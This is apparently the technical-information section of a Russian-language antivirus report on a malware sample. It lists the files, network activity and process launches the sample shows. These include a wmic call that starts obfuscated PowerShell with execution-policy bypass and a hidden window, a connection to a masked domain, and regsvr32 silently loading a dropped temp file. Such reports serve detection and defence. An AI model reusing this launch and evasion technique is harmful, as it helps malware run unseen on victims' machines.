Техническая информация
- '<SYSTEM32>\wbem\wmic.exe' PRoCEss 'call' "CReatE" "pOWERSHElL -eP BypaSS -NONinTER -nOPRofiLe -win 01 . ( $SHElLiD[1]+$shELLiD[13]+'x')( "\" .( `$eNV:comSPec[4"\" + ([ChAR]44).ToString() + "\"26"\" + ([ChAR]4...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\ose00000
- 'pa###sog.com':443
- DNS ASK pa###sog.com
- '<SYSTEM32>\wbem\wmic.exe' PRoCEss 'call' "CReatE" "pOWERSHElL -eP BypaSS -NONinTER -nOPRofiLe -win 01 . ( $SHElLiD[1]+$shELLiD[13]+'x')( "\" .( `$eNV:comSPec[4"\" + ([ChAR]44).ToString() + "\"26"\" + ([ChAR]4...' (со скрытым окном)
- '<SYSTEM32>\regsvr32.exe' -s %TEMP%\ose00000.